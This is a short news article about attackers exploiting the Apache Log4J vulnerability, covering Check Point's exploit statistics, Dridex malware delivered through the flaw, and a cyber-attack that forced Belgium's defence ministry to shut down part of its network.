New malware strains exploiting Log4J; Belgium defence ministry latest victim

As enterprise security teams scramble to plug their systems against the existing Apache Log4J vulnerabilities, a new malware strains exploiting the flaws and attack against the Belgium’s defence ministry have come to the fore. 

CheckPoint yesterday reported that the percentage of attempted exploits in the Log4J logging library has increased from 44% last Tuesday to 48% today.  

Yesterday, Google said that the full blast radius of the vulnerabilities would be difficult to be identified.  

“Since Friday we witnessed what looks like an evolutionary repression, with new variations of the original exploit being introduced rapidly- over 60 in less than 24 hours,” the CheckPoint blog post said.  

Newer variations include the ability to exploit vulnerabilities over HTTP or even HTTPS. This would make one layer of security protection inadequate, with a multi-layered posture being an absolute necessity, according to Check Point.   

Separately, a security research company, Cryptolaemus Security research group, yesterday said that it has confirmed a malware known for targeting the BFSI sector, Dridex, was delivered through a Log4J vulnerability.   

The company posted on Twitter that Dridex payloads have already been delivered onto multiple Windows devices.

Defence Ministry of Belgium briefly compromised  

Alarmingly, the Defence Ministry of Belgium said in a local Belgian newspaper report that a portion of its network was shut down owing to a cyber-attack on Thursday.  

The defence body confirmed that the attack was the result of a security hole in Apache’s widely used software Log4J.   

"All weekend our teams have been mobilized to control the problem, continue our activities and warn our partners," said Commander Olivier Séverin to local newspaper De Standard.  

“It is clearly one of the most serious vulnerabilities on the internet in recent years. When we discussed the Cyber pandemic, this is exactly what we meant – quickly spreading devastating attacks,” Checkpoint warned.